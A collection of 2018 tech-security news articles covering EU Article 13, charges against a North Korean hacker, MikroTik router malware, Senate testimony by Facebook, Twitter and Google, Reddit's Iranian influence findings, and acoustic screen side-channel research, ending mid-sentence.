Tech News - Security

Robert Kyncl, YouTube's Chief Business Officer, opened up on YouTube’s Creator Blog, on Tuesday. This was about  “Article 13” in the EU proposal, which is currently up for a vote in the European Parliament on September 12. According to Article 13, there is an “obligation on information society service providers storing and giving access to large amounts of works and other subject-matter uploaded by their users to take appropriate and proportionate measures to ensure the functioning of agreements concluded with right holders and to prevent the availability on their services of content identified by rightholders in cooperation with the service providers”. In a nutshell, any user-generated content on these online platforms that a copyright enforcement algorithm considers as copyrighted work would need to be censored by these platforms. This is a new revamped version that EU has come out with as the older version was rejected by the Parliament back in July. The older version also received heavy criticism from different policy experts and digital rights group on grounds of violating the fundamental rights of the internet users. “The "Article 13” potentially undermine this creative economy, discouraging or even prohibiting platforms from hosting user-generated content. This outcome would not only stifle your creative freedom, it could have severe, negative consequences for the fans, the communities and the revenue you have all worked so hard to create,” mentioned Kyncl. Kyncl also pointed out how the creators and artists on these platforms have built businesses “on the back” of this “openness”.  YouTube has a strong set of copyright management tools like Content ID and a Copyright Match Tool which are pretty efficient at managing the re-uploads of creators’ content. “Copyright holders have control over their content: they can use our tools to block or remove their works, or they can keep them on YouTube and earn advertising revenue. In over 90% of cases, they choose to leave the content up. Enabling this new form of creativity and engagement with fans can lead to mass global promotion and even more revenue for the artist.” reads the YouTube blog post. A good example given by Kyncl is that of a famous pop singer, Dua Lipa whose singing career started with covering songs of other Artists. Also, Alan Walker’s worldwide famous track “Fade”  was heavily used by other users in the YouTube community along with being used in video games. This resulted in a massive fanbase for him. YouTube is not the only one disapproving of the new proposal. Other organizations such as  European Digital Rights, the Internet Archive, Patreon, Wordpress, and Medium have all opened up about their disapprobation against the EU copyright policy. “This is the new creative economy in action. The Copyright Directive won’t just affect creators and artists on YouTube. It will also apply to many forms of user-generated content across the Internet” writes Kyncl. For more information, check out the official YouTube blog post. YouTube has a $25 million plan to counter fake news and misinformation Mozilla, Internet Society, and web foundation wants G20 to address “techlash” fuelled by security and privacy concerns Facebook COO, Sandberg’s Senate testimony: On combating foreign influence, fake news, and upholding election integrity

The US Justice Department has charged a North Korean hacker, Park Jin Hyok for the devastating cyberattacks that hacked Sony Pictures Entertainment and unleashed the WannaCry ransomware virus in 2017. The US alleges that Mr. Park worked as a computer programmer for Chosun Expo Joint Venture,a wing of the North Korean military. Hyok is charged with extortion, wire fraud, and various hacking crimes that could potentially carry a prison term up to 25 years. The criminal complaint against Hyok was filed in Los Angeles federal court in June, and unsealed this Thursday. It alleges that Mr. Park and the Joint Venture sought to “conduct multiple destructive cyber attacks around the world” in support of the North Korean government. Timeline of Cybercrimes committed by Hyok In 2017, the Wannacry ransomware attack affected more than 230,000 computers and caused hundreds of millions of dollars in damages around the world. One of the main targets affected was the UK’s National Health System, which was forced to cancel thousands of appointments after its systems were infected. The Justice Department asserts that the North Korean hacking team both developed the ransomware and propagated the attacks. Mr. Park is also charged in connection with an $81 million (£62 million) theft from a bank in Bangladesh in 2016. He is further accused of aiding the 2014 hack into Sony Pictures Entertainment, in which data was destroyed and internal documents were made publicly available online for anyone to download. The attack came shortly after Sony produced a comedy film ‘The Interview’, about an attempted assassination on a man who, was made to look like North Korean leader Kim Jong-un indirectly mocking him. According to the Justice Department, Mr. Park is also charged for “numerous other attacks or intrusions on the entertainment, financial services, defence, technology, and virtual currency industries, academia, and electric utilities”. The charges were filed four days before President Donald Trump’s meeting with North Korea’s leader, Kim Jong-n, to discuss ending hostility between the two countries. Prosecutors confirm that said the complaint wasn’t sealed to prevent derailing their meet in Singapore. Head over to cnet for more insights to this news. Microsoft claims it halted Russian spearphishing cyberattacks Bloomberg says Google, Mastercard covertly track customers’ offline retail habits via a secret million dollar ad deal New cybersecurity threats posed by artificial intelligence

A research done by China's Netlab 360 revealed thousands of routers manufactured by the Latvian company MikroTik to be compromised by a malware attacking the Winbox, a Windows GUI application. This vulnerability allows gaining access to an unsecured router. The Winbox vulnerability was revealed in April this year and MicroTik had also posted a software update for the same. However, researchers found that more than 370,000 MikroTik devices they identified on the Internet were still vulnerable. According to a report by Netlab 360's Genshen Ye, “More than 7,500 of them are actively being spied on by attackers, who are actively forwarding full captures of their network traffic to a number of remote servers. Additionally, 239,000 of the devices have been turned into SOCKS 4 proxies accessible from a single, small Internet address block.” Prior to the MicroTik attack, WikiLeaks revealed a vulnerability from the CIA's ‘Vault7’ toolkit. According to WikiLeaks, the CIA Vault7 hacking tool Chimay Red involves 2 exploits, including Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability. Attacks discovered on the MicroTik routers Previously, researchers at Trustwave also had discovered two malware campaigns against MikroTik routers based on an exploit reverse-engineered from a tool in the Vault7 leak. #1 Attack targeting routers with CoinHive Malware The first attack targeted routers in Brazil with CoinHive malware. The attack injected the CoinHive JavaScript into an error page presented by the routers' Web proxy server. It further redirected all Web requests from the network to that error page. However, in routers affected by this type of malware found by the Netlab 360 team, all the external web resources, including those from coinhive.com necessary for web mining, are blocked by the proxy ACLs (access control lists) set by attackers themselves. #2 Attack that turns affected routers into a malicious proxy network The other attack, discovered by the Netlab 360 team, has turned affected routers into a malicious proxy network. This was done by using the SOCKS4 protocol over a very non-standard TCP port (4153).  Ye said that “Very interestingly, the Socks4 proxy config only allows access from one single net-block, 95.154.216.128/25.” Most of the traffic is said to be going to 95.154.216.167, an address associated with a hosting service in the United Kingdom. This attack includes the addition of a scheduled task to report the router's IP address back to the attacker to help maintain the persistence of the SOCKS proxy if the router is rebooted. Eavesdropping on routers NetLab 360 researchers also discovered that more than 7,500+ victims are being actively eavesdropped and were largely streaming network traffic. This includes FTP and emails focused traffic, as well as some traffic associated with network management. Majority of the streams, almost 5,164 of them, were being sent to an address associated with an ISP in Belize. Attackers have leveraged MikroTik's built-in packet-sniffing capabilities for eavesdropping over the network. Here, the sniffer, which uses the TZSP protocol, can send a stream of packets to a remote system using Wireshark or other packet capture tools. To know more about this news in detail, visit the Netlab 360 blog. Google’s Protect your Election program: Security policies to defend against state-sponsored phishing attacks, and influence campaigns Homebrew’s Github repo got hacked in 30 mins. How can open source projects fight supply chain attacks? Apache Struts faces code execution flaw risking enterprises to attacks

Five months after Facebook founder Mark Zuckerberg appeared before Congress, the US government once again invited top tech executives from Facebook, Twitter, and Google to the fourth and final installment of the series of high profile hearings on social media’s role in US democratic proceedings. Facebook COO Sheryl Sandberg and Twitter CEO Jack Dorsey faced the Senate Select Intelligence Committee, for the purpose to discuss the National Security issues and foreign interference through social media platforms in US elections. Google was notably absent from the proceedings, after the firm failed to send a senior executive ‘at the right level’ to Washington. Google submitted a written testimony ahead of the hearing, which the Senate discarded. In place of a Google representative, the Senate committee left an empty chair. Opening Remarks from the Senate Chairman Richard Burr and the Vice Chairman Mark Warner Chairman of the Senate Richard Burr made his opening remarks welcoming Jack Dorsey CEO Twitter and Sheryl Sandberg COO Facebook. He started with some words from the recently passed John McCain. McCain's place at the hearing was marked with a single white rose on a black cloth. "He will be dearly missed," Chairman Burr says. He opened his speech discussing about social media in the last 18 months. He acknowledged its immense potential for good but highlighted how the recent past has show how vulnerable social media can be to corruption and misuse. He said the committee takes this issue very seriously and appreciates the fact that Facebook and Twitter have taken responsibility with an equivalent and appropriate measures of seriousness and unlike their peer Google, have shown up for the hearing with the ‘appropriate level of corporate representation’. He further added that the purpose of this hearing was to discuss the role social media plays into the execution of foreign influence operations. The Chairman precisely made a point that its important we be candid with our language because that is what the significance of this threat demands. He said, “We need to be precise about the foreign actors we talking about. We need to be precise about the consequences of not acting and we need to be candid about being responsible for solving this problem and where it lies.” Chairman Burr's said that "business as usual" for these tech firms is not good enough. "We've identified the problem, now we've got to find a solution," he added. He also adds a jibe at Google for failing to send the "right senior executive". His sentiments were echoed by Vice Chairman Mark Warner, who took over from Burr. He was "deeply disappointed" in Google for not taking the issues being discussed yesterday seriously enough. Vice Chairman Mark, also put forward some thoughts and open questions to Twitter and Facebook to improve their policies and systems: Users should have the right to know when they are interacting with bots or humans on the platform Isn't there a public interest in ensuring there is more anonymised data to help researchers and academics identify potential problems and misuse. Why are your terms of service so difficult to find and nearly impossible to read and understand Ideas like data portability, data immunization or first party consent should be adopted After encountering numerous situations of misuse, what kind of accountability should be implemented to the flawed advertising model Sheryls Sandberg’s defending comments The Facebook CEO Sheryl Sandberg smoothly projected the impression that the company is always doing something. Whether that’s on combating hate speech, hoaxes and “inauthentic” content, or IDing and blocking state-level disinformation campaigns — thereby shifting attention off the deeper question of whether Facebook is doing enough. Many of her answers courteously informed senators that Facebook would ‘follow up’ with answers and/or by providing some hazily non-specific ‘collaborative work’ at some undated future time — which is the most professional way to kick awkward questions. Sheryl started her opening remarks by thanking the committee for giving her the opportunity to talk in the Senate Hearing. Referring to her written testimony which goes into more detail and here few points Sandberg reiterated in the session. Russia used our platform to interfere in the US elections and Facebook was too slow to spot this and too slow to act and that is on us, she said She mentioned about taking collaborative efforts with government and law enforcement committees. She further stated that at Facebook they are investing in long term security, and have doubled the number of people working in safety and security. They are able to view security reports in 50 languages 24 hours a day. They use better ML and AI techniques to be more proactive in finding abuse. Their first line of defense is finding and taking down the fake accounts and pages. Blocking millions of attempts to make fake accounts. Making progress on fake news and limiting their distribution as well. They demark articles by third party fact checkers and warn people who give them or about to share them. They show them related articles with more facts for a more well rounded opinion. Strong steps taken to prevent abuse and increase transparency on their advertising platform. For political issue you can now see who paid for the ads, how much they paid and the demographics of the advertisers. Advertisers are also required to go through a long authorization process to confirm their authentic identity. Finally Sandberg concluded by saying these steps wont stop people who are trying to game the system but it will make it a lot harder. She emphasized on working more collaboratively with the government and law enforcement agencies. She continued that Facebook is more determined than its opponent and they are in a grey area working together to meet this challenge. Jack dorsey’s defence “We weren’t expecting any of this when we created Twitter over 12 years ago. We acknowledge the real-world negative consequences of what happened, and we take full responsibility to fix it.” Here's the opening to Jack Dorsey's prepared statement: “Thank you for the opportunity to appear before the Committee today so I may speak to you and the American people. Twitter’s purpose is to serve the public conversation. We are an American company that serves our global audience by focusing on the people who use our service, and we put them first in every step we take. Twitter is used as a global town square, where people from around the world come together in an open and free exchange of ideas. We must be a trusted and healthy place that supports free and open discussion. Twitter has publicly committed to improving the collective health, openness, and civility of public conversation on our platform. Twitter’s health is measured by how we help encourage more healthy debate, conversations, and critical thinking. Conversely, abuse, malicious automation, and manipulation detracts from the health of our platform. We are committed to hold ourselves publicly accountable towards progress of our health initiative. Today, I hope my testimony before the Committee will demonstrate the challenges that we are tackling as a global platform. Twitter is approaching these challenges with a simple question: How do we earn more trust from the people using our service? We know the way we earn more trust around is how we make decisions on our platform to be as transparent as possible. We want to communicate how our platform works in a clear and straightforward way.” Jack mentions, “Abuse, harassment, troll armies, propaganda through bots and human coordination, misinformation campaigns, and divisive filter bubbles…that‘s not a healthy public square. Worse, a relatively small number of bad-faith actors were able to game Twitter to have an outsized impact. We weren’t expecting any of this when we created Twitter over 12 years ago. We acknowledge the real-world negative consequences of what happened, and we take full responsibility to fix it. We’ve seen positive results from our work. We‘re now removing over 200% more accounts for violating our policies. We’re identifying and challenging 8-10 million suspicious accounts every week. And we’re thwarting over a half million accounts from logging in to Twitter every day. Today we‘re committing to the people, and this committee, to do that work, and do it openly. We‘re here to contribute to a healthy public square, not compete to have the only one.” Few Questions to the witnesses from the Senators in the committee Senator James E. Risch Questions on Hate Speech “Who sets the security standards or the descriptions of authority of manipulative content and if there is any kind of unanimity amongst them or are there any debates or hate speeches in the team” Sandberg said that language that leads to violence is not permitted on their platform and Twitter CEO Dorsey shares the same views. Risch asked whether there was any way for Facebook to find any distinction between US citizens and people from other countries. Sandberg responded saying Facebook asks people to declare where they are from. People are allowed to talk about any country, but are not allowed to talk about hate. They are not allowed to interfere or influence elections. Facebook is also looking to dive further into transparency reporting. Twitter is focusing on behavioural patterns. It tracks common patterns of behaviour and utilizes that information to find out the unauthentic content. They have built deep learning and machine learning technologies to recognize these patterns quickly and shut them before they spread in other areas. Senator Martin Heinrich on Threat to Elections “What is it that you have learned from the past elections since 2016 as the platforms have been used throughout the course of a number of elections around the world. And how you have informed your current posture in terms of how you are gaining transparency in this activity?” Sandberg said that Facebook is getting smarter at detecting and preventing threats to elections but warned that the opponents are getting smarter as well. Dorsey followed by mentioning how Twitter is working with AI tools to recognise patterns of behaviour that allow people to artificially amplify information. Senator Susan Collins on why Twitter doesn't intimate individuals “Once you’ve taken down accounts that are linked to Russia, these imposter accounts, what do you do to notify the followers of those accounts that they have been following or engaged in accounts that originated in Russia and are not what they appear to be.” “We simply haven’t done enough… we do believe transparency is a big part of where we need improvement... We need to meet people where they are... We are going to do our best to make sure that we catch everything via external partnership and other channels. We recognise we need to communicate more directly,” said Jack Dorsey. He also added, “We are looking to incentivise people not only based on the number of followers they have but also the way they share content online. By what kind of content they share. We are also looking to expand our transparency report and extend the same to the public.” How Can Facebook & Twitter Clean Their Systems? “We have been investing heavily in identifying bad actors in the system. Most of our takedown have been on our own, but we have coordinated with external parties to make this successful.” said Sandberg. Dorsey had his own response saying, “There are a number of short term risks involved but the only way we'll grow is by building the platform's health and we have strengthened our partnership with government agencies and law enforcement partners.” The stock prices of Twitter and Facebook don’t seem to be holding up to the questioning and have been dropping since the hearing began. Sandberg added, “the most important determinant is what people choose to follow. If you don’t want to follow someone we encourage that. We are going to do a contribution to investing in technology to figure out a solution to battle deep fake news.” “I encourage both of you to work closely with academia… I hope that you will commit to providing data that goes beyond a 3 year window to researchers who are looking into Russian influence on your platforms”, concluded Senator Collins Senator Harris on business incentive alignment and policy inconsistencies at Facebook “What metric are you using to calculate the revenue generated associated with those [inorganic] ads? And what is the dollar amount that is associated with that revenue?... What percentage of content on Facebook is inorganic?.. You must know.” Sandberg answered, “Ads don’t run with inorganic content on our service. So there is no way to firmly ascertain how much ads are attached to how much organic content and that’s not how we work.” Harris further asked “How can you reconcile an incentive to create and increase your user engagement when the content that generates a lot of engagement is often inflammatory in nature?” Sandberg gave a specific example of Facebook’s hate speech moderation failure, a financially incentivized policy and moral failure. She referenced a ProPublica report from June 2017, which revealed the company had told moderators to delete hate speech targeting white men but not black children as they were a protected class. She continued that it was a bad policy and they had fixed it. Harris questioned whether the policy was changed after the report? To which Sandberg uncomfortably responded about getting back to the committee on the specifics of when and what would have happened. Senator Blunt on liability implications and learning from attempts at improving the platforms this year “In the interest of transparency and public education…, are you willing to archive suspended accounts...?” Dorsey opened by saying, “As we think about our singular priority of improving the health of public conversations, we are not going to be able to do long term work unless we’re look at the incentives that our product is asking people to do everyday.” Dorsey agreed that archiving historical data is a great idea, but further understanding of the legal implications of such an action is needed. “The business implications, the liability implications of what we’re asking you to do are pretty grey,... what’s the challenge here?” asked Blunt. Tighter co-ordination helps, said Sandberg responded. We’d like regular cadence of meetings with our law enforcement partners, we’d love to understand the secular trends that they are aware of in our peer companies our other mediums or more broadly that would inform us on how to act faster. We’d appreciate consolidating to a single point of contact instead of bouncing between multiple agencies to do our work,” added Dorsey. Senator Lankford on Data of Suspended Accounts Both Twitter and Facebook keep records of the suspended accounts for later analysis and also for referrals by law and enforcement bodies. Sandberg was also questioned on the number of fake accounts on Facebook. Senator Manchin on Why Facebook & Twitter Don't Operate in China Both Facebook and Twitter do not operate in China because the Chinese government hasn’t allowed both these platforms in the country. Sandberg and Dorsey unanimously replied to the senator. US Senator Cotton on Why Wikileaks is Active on Facebook and Twitter WikiLeaks and Julian Asange remain active on Facebook & Twitter. Sandberg said that these accounts don’t violate any of Facebook's terms. Dorsey also supported the viewpoint and clarified that Twitter is open to inviting law and enforcement to investigate if needed. US Senate Vice Chairman Mark Warner Wraps It Up Warner thanked both Dorsey and Sandberg for their presence and urged both to make their platforms safer for users across the US. He also thanked them for taking down bad actors online and in helping fight against fake news. US Senate Chairman Richard Burr also thanked both the individuals for being present and addressing the senators’ questions. To watch the full coverage of the hearing visit the US Senate Select Intelligence official page. Google’s Senate testimony, “Combating disinformation campaigns requires efforts from across the industry.” Twitter’s CEO, Jack Dorsey’s Senate Testimony: On Twitter algorithms, platform health, role in elections and more Facebook, Twitter takes down hundreds of fake accounts with ties to Russia and Iran, suspected to influence the US midterm elections

Ahead of today’s congressional hearing on social media companies’ efforts to thwart election meddling in advance of November’s midterm races, Alphabet Inc.’s Google posted a “testimony”. The Senate had invited Alphabet Inc. CEO Larry Page, and also extended the invitation to Google CEO, Sundar Pichai to testify in the hearing. However, both officials aren’t attending the hearing, and Google has planned to send its Chief legal officer Kent Walker, instead, to testify before the panel. The Senate Intelligence Committee has rejected Google’s Chief Legal Officer Kent Walker as a witness. The committee finds Walker as not placed high-level enough in the company to testify at Wednesday’s hearing. The panel expects to hear testimony from Twitter Inc. Chief Executive Jack Dorsey and Facebook Inc. Chief Operating Officer Sheryl Sandberg as well on Wednesday. Kent Walker says in his blog post, “I will be in Washington briefing Members of Congress on our work on this and other issues and answering any questions they have, and will be submitting this testimony.” Here are the key highlights of the testimony: Verification program: A verification program has been rolled out for anyone who wants to purchase a federal election ad on Google in the U.S. Google will require advertisers to provide government-issued identification information and other key information to confirm they are a U.S. citizen or lawful permanent resident or a U.S.-based organization, as per the law. In-ad disclosures: To help people better understand who is paying for an election ad Google has incorporated In-ad ​Disclosures. It means Google will be able to identify by name advertisers running election-related campaigns on Search, YouTube, Display and Video 360, and the Google Display Network. Transparency report: Google launched a “Political advertising on Google” Transparency Report​ for election ads, which will provide data about the entities buying election-related ads on the platforms, how much money is spent across states and congressional districts on such ads, and who the top advertisers are overall. The report will also show the keywords advertisers have spent the most money on ads of political importance during the current U.S. election cycle from May 31st, 2018 onwards. Searchable election Ad library: Finally, Google will offer a searchable election Ad ​Library ​within their ​public Transparency Report which will show things like which ads had the highest views, what the latest election ads running on our platform are, and deep dives into specific advertisers’ campaigns. The data shows the overall amount spent and number of ads run by each election advertiser, and whether the advertiser targeted its ad campaigns geographically or by age or gender. It will also show the approximate amount spent on each individual ad, the approximate impressions generated by each ad, and the dates each ad ran on the platform. In addition to the transparency efforts, Google has implemented a number of initiatives to improve the cybersecurity posture of candidates, campaigns, and the election infrastructure. In October 2017, they unveiled the Advanced Protection Program​, which they claim, will provide the strongest account protection that Google offers. Second, in May 2018, Google’s Jigsaw project, dedicated to building technology to address significant security challenges, announced the availability of Project Shield ​to U.S. political organizations (e.g., candidates, campaigns, political action committees) registered with the 3 appropriate electoral authorities. Project Shield is a free service that will use Google technology to prevent distributed denial of service (DDoS) attacks that block access to content. Lastly Google continues to issue warnings to users​ when they are suspicious about the risk of state-sponsored efforts hijacking their accounts. But they also acknowledge that combating disinformation campaigns is next to impossible for any single company to shoulder. “We have deployed our most advanced technologies to increase security and fight manipulation, but we realize that no system is going to be 100% perfect. Our algorithms are designed to identify content that many people find relevant and useful. We are constantly looking to find signals that help us identify deceptive content, while promoting content that is authoritative, relevant, and current. We have made substantial progress in preventing and detecting abuse, and are seeing continued success in stopping bad actors attempting to game our systems. And as threats evolve, we will continue to adapt in order to understand and prevent new attempts to misuse our platforms. We certainly can’t do this important work alone. Combating disinformation campaigns requires efforts from across the industry. We’ll continue to work with other companies to better protect the collective digital ecosystem, and, even as we take our own steps, we are open to working with governments on legislation that promotes electoral transparency.” Kent concluded saying, “While the nature of our services and the way we run our advertising operations appears to have limited the amount of state-sponsored interference on our platforms, no system is perfect—and we are committed to taking continuing action to address the issue. Over the course of the last 18 months.” Facebook COO, Sandberg’s Senate testimony: On combating foreign influence, fake news, and upholding election integrity Twitter’s CEO, Jack Dorsey’s Senate Testimony: On Twitter algorithms, platform health, role in elections and more

In the US Senate select committee hearing Facebook COO, Sheryl Sandberg has put forward Facebook’s testimony to the US Senate select committee on Wednesday, 5th September 2018. Twitter and Google also have their side of testimonies to be offered in the hearing. Facebook has had a tumultuous couple of years centered around the misuse of its platform and abuse of its users’ data and privacy by advertisers, political entities and foreign bad actors.  The Cambridge Analytica scandal is just one example. Another is where Russians used Facebook to meddle with the 2016 US Presidential elections. Sheryl Sandberg in her testimony started with an apologizing statement, “We were too slow to spot this and too slow to act. That’s on us. This interference was completely unacceptable. It violated the values of our company and of the country we love.” She had also highlighted the efforts taken by Facebook to keep its community safe and the user services secure, which include: Using artificial intelligence to help find bad content and locate bad actors. Shutting down fake accounts and reducing the spread of false news. Set up new ad transparency policies, ad content restrictions, and documentation requirements for political ad buyers. Better anticipation of risks and working closely with law enforcement and its industry peers to share information and make progress together. Removed hundreds of Pages and accounts involved in coordinated inauthentic behavior— meaning they misled others about who they were and what they were doing. Sandberg further touched upon these highlights in detail and presented ways in which Facebook is looking forward to combat the issues. She said, “At its best, Facebook plays a positive role in our democratic process—and we know we have a responsibility to protect that process on our service. We’re investing for the long term because security is never a finished job. Our adversaries are determined, creative, and well-funded. But we are even more determined—and we will continue to fight back.” Facebook assesses past Russian attempts to influence elections Sheryl said that, before the election day in November 2016, Facebook committee detected and mitigated several threats from actors--such as the APT28 activity-- that had ties to Russia. They also recorded new behaviour such as the creation of fake IDs which were linked to a Facebook page named DCLeaks, which was later removed by them. Read more: DCLeaks and Guccifer 2.0: How hackers used social engineering to manipulate the 2016 U.S. elections Post the 2016 elections, Facebook found that the Internet Research Agency (IRA), a Russian entity located in St. Petersburg, Russia, had used coordinated networks of fake Pages and accounts to interfere in the election. Sheryl stated, “Around 470 fake Pages and accounts associated with the IRA spent approximately $100,000 on about 3,500 Facebook and Instagram ads between June 2015 and August 2017. Our analysis showed that these accounts used these ads to promote roughly 120 Facebook Pages that they had set up, which had posted more than 80,000 pieces of content between January 2015 and August 2017. We shut down the accounts and Pages we identified at the time that were still active. The Instagram accounts we deleted had posted about 120,000 pieces of content.” In April of this year, Facebook took down more than 270 additional Pages and accounts controlled by the IRA and it continues to monitor its service for abuse and share information with law enforcement and others in the industry about these threats. Facebook combats Foreign election interference AND also advances on Election Integrity Facebook has more than doubled the number of people working on safety and security and now have over 20,000 people. They review reports in over 50 languages, 24 hours a day. Use of better machine learning technology and artificial intelligence have also enabled highly proactive identification of abuses. Sheryl mentioned that Facebook focusses on removing Fake Accounts. She added, “One of the main ways we identify and stop foreign actors is by proactively detecting and removing fake accounts, since they’re the source of much of the interference we see.” Some important measures Facebook is taking are: Use of both automated and manual review to detect and deactivate fake accounts. These systems analyze distinctive account characteristics and prioritize signals that are more difficult for bad actors to disguise. It has blocked millions of attempts to register fake accounts every day. It has globally disabled 1.27 billion fake accounts from October 2017 to March 2018. By using technologies like machine learning, artificial intelligence, and computer vision, Facebook is proactively detecting more bad actors and take action more quickly. Read More: Four 2018 Facebook patents to battle fake news and improve news feed Tackling False News: Facebook has partnered with third-party fact-checking organizations to limit the spread of articles they rate as false, and it further disrupts the economic incentives for traffickers of misinformation. It has also invested in news literacy programs and work to inform people by providing more context on the stories it sees. Increasing Ad Transparency. Facebook has taken strong steps to prevent abuse and increase transparency in advertising. They ensure all politics and issue ads on Facebook and Instagram in the U.S. are clearly labeled with a “Paid for by” disclosure at the top of the ad so people can see who is paying for them. This is especially important when the Page name doesn’t match the name of the company or person funding the ad. Enforcing Compliance with Federal Law. Facebook’s compliance team maintains a Political Activities and Lobbying Policy that is available to all employees. This Policy is covered in its Code of Conduct training for all employees and includes guidelines to ensure compliance with the Federal Election Campaign Act. Suspicious Activity Reporting. Facebook has designed certain processes to identify inauthentic and suspicious activity. It also maintains a sanctions compliance program to screen advertisers, partners, vendors, and others using its payment products. Its payments subsidiaries file Suspicious Activity Reports on developers of certain apps and take other steps as appropriate, including denying such apps access to the facebook platform. Facebook defending against targeted hacking Sheryl Sandberg also highlighted how Facebook is strengthening its defenses against a broader set of threats. Some of the defenses include: Building AI systems to detect and stop attempts to send malicious content. Providing customizable security and privacy features, including two-factor authentication options and marketing to encourage people to adopt them. Sending notifications to individuals if they have been targeted by sophisticated attackers, with custom recommendations depending on the threat model. Sending proactive notifications to people who have not yet been targeted, but may be at risk based on the behavior of particular malicious actors. Deploying AI systems to monitor login patterns and detect the signs of a successful account takeover campaign. Facebook working with government entities, industry, and civil society Sheryl mentioned in her testimony, “We have worked successfully with the DOJ, the FBI, and other law enforcement agencies to address a wide variety of threats to our platform, and we are actively engaged with DHS and the FBI’s new Foreign Influence Task Force focused on election integrity.” Facebook has also partnered with cybersecurity firms such as FireEye, which informed it about a network of Pages and accounts originating from Iran that engaged in coordinated inauthentic behavior. Based on which, Facebook started an investigation and identified and removed additional accounts and Pages from the network. The FB security team regularly conducts internal reviews to monitor for state-sponsored threats that are not publicly disclosed, for security reasons. They monitor and assess thousands of account details, such as location information and connections to others on Facebook. Sheryl also added, “As part of official investigations, government officials sometimes request data about people who use Facebook. We have an easily accessible online portal and processes in place to handle these government requests, and we disclose account records in accordance with our terms of service and applicable law. We also have law enforcement response teams available around the clock to respond to emergency requests.” Facebook also participated in discussions with governments around the world at key events such as the Munich Security Conference and CyCon, which is organized by the NATO Cooperative Cyber Defense Centre of Excellence. Sheryl Sandberg concluded her testimony by saying that, the Facebook community is learning from what happened and is improving. She said, “When we find bad actors, we will block them. When we find content that violates our policies, we will take it down. And when our attackers use new techniques, we’ll share them to improve our collective defense. We are even more determined than our adversaries, and we will continue to fight back.” Here’s the link to Sheryl Sandberg’s complete testimony to the US Senate Committee. Facebook’s AI algorithm finds 20 Myanmar Military Officials guilty of spreading hate and misinformation, leads to their ban A new conservative employee group within Facebook to protest Facebook’s “intolerant” liberal policies Facebook Watch is now available worldwide challenging video-streaming rivals, YouTube, Twitch, and more

After FireEye’s announcement on a suspected influence operation (using a network of fake news sites) in Iran two weeks ago, Reddit started its own investigation into these suspicious websites. Just two days ago, Reddit has shared the findings of its investigation. It has also consulted with third parties to dig deeper into the matter and get more relevant information. The influence group in Iran is leveraging the inauthentic websites “to promote political narratives in line with Iranian Interests”. These narratives comprises of anti-Saudi, anti-Israeli, and pro-Palestinian themes. It also provides support for U.S. policies which are favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). According to Reddit, 143 accounts have been uncovered so far that are suspected to be linked to this influence group. The majority (126) of these accounts were created between 2015 and 2018, with a few (17) of these accounts dating back to 2011. More than 51 accounts were banned by Reddit before beginning the investigation as part of their trust and safety practices. Additionally no ads were posted by these accounts on Reddit. These groups were found to be focussed on discussing subjects that are important to Iran such as criticism of US policies in the Middle East, negative sentiment toward Saudi Arabia and Israel and discussions regarding Syria and ISIS. Around 60% of the accounts had karma below 1,000 out of which 36% of these accounts had zero or negative karma. However, a minority of 40% of the accounts had more than 1,000 karma. Reddit is planning to keep these accounts with varied karma levels public. This is to make the moderators, investigators, and the users on Reddit more aware of the tactics that foreign agents could attempt to use. However, Reddit will be removing some accounts in the future. Reddit found the behavior of these accounts quite different in the sense that even though the overall influence of these accounts was low, some of these accounts were still able to gain traction. It was noted that these accounts would share news and articles aligned to Iran’s political narrative such as highlighting civilian deaths in Yemen. The investigation is, according to Reddit, a tribute to the “incredible vigilance” of the Reddit community. Reddit is now planning to develop a trusted reporter system which will be able to better separate useful information from the junk. They’re also investing in advanced detection and mitigation methods. “Our actions against these threats may not always be immediately visible to you, but this is a battle we have been fighting, and will continue to fight for the foreseeable future. And of course, we’ll continue to communicate openly with you about these subjects” says the Reddit team. For more information, read the official FireEye report. Read next Google’s Protect your Election program: Security policies to defend against state-sponsored phishing attacks, and influence campaigns Intel faces backlash on Microcode Patches after it prohibited Benchmarking or comparison

With a little help from machine learning, you might know what the people on the other end of a Hangouts session are really looking at on their screens. Based on research published at the CRYPTO 2018 Conference in Santa Barbara last week your webcam could give details on what's on your screen, if the person on the other end is listening the right way. All you'll need to do is process the audio picked up by their microphones. Daniel Genkin of the University of Michigan, Mihir Pattani of the University of Pennsylvania, Roei Schuster of Cornell Tech and Tel Aviv University, and Eran Tromer of Tel Aviv University and Columbia University investigated a potential new avenue of remote surveillance dubbed as "Synesthesia”. It is a side-channel attack that can reveal the contents of a remote screen, providing access to potentially sensitive information based solely on "content-dependent acoustic leakage from LCD screens.” Anyone who remembers working with cathode ray tube monitors is familiar with the phenomenon of coil whine. Even though LCD screens consume a lot less power than the old cathode ray tube (CRT), they still generate the same sort of noise, though in a totally different frequency range. Because of the way computer screens render a display—sending signals to each pixel of each line with varying intensity levels for each sub-pixel—the power sent to each pixel fluctuates as the monitor goes through its refresh scans. Variations in the intensity of each pixel create fluctuations in the sound created by the screen's power supply, leaking information about the image being refreshed—information that can be processed with machine learning algorithms to extract details about what's being displayed. That audio could be captured and recorded in a number of ways, as demonstrated by the researchers: Over a device's embedded microphone or an attached webcam microphone during a Skype, Google Hangouts, or other streaming audio chat Through recordings from a nearby device, such as a Google Home or Amazon Echo Over a nearby smartphone; or with a parabolic microphone from distances up to 10 meters Even a reasonably cheap microphone could pick up and record the audio from a display, even though it is just on the edge of human hearing And it turns out that audio can be exploited with a little bit of machine learning black magic. The researchers began by attempting to recognize simple, repetitive patterns. They created a simple program that displays patterns of alternating horizontal black and white stripes of equal thickness (in pixels), which shall be referred to as Zebras, the researchers recounted in their paper. These "zebras" each had a different period, measured by the distance in pixels between black stripes. As the program ran, the team recorded the sound emitted by a Soyo DYLM2086 monitor. With each different period of stripes, the frequency of the ultrasonic noise shifted in a predictable manner. The variations in the audio only really provide reliable data about the average intensity of a particular line of pixels, so it can't directly reveal the content of a screen. However, by applying supervised machine learning in three different types of attacks, the researchers demonstrated that it was possible to extract a surprising amount of information about what was on the remote screen. After training, a neural-network-generated classifier was able to reliably identify which of the Alexa top 10 websites was being displayed on a screen based on audio captured over a Google Hangouts call—with 96.5 percent accuracy. In a second experiment, the researchers were able to reliably capture on-screen keyboard strokes on a display in portrait mode (the typical tablet and smartphone configuration) with 96.4 percent accuracy, for transition times of one and three seconds between key "taps." On a landscape-mode display, accuracy of the classifiers was much lower, with a first-guess success rate of only 40.8 percent. However, the correct typed word was in the top three choices 71.9 percent of the time for landscape mode, meaning that further human analysis could still result in accurate data capture. (The 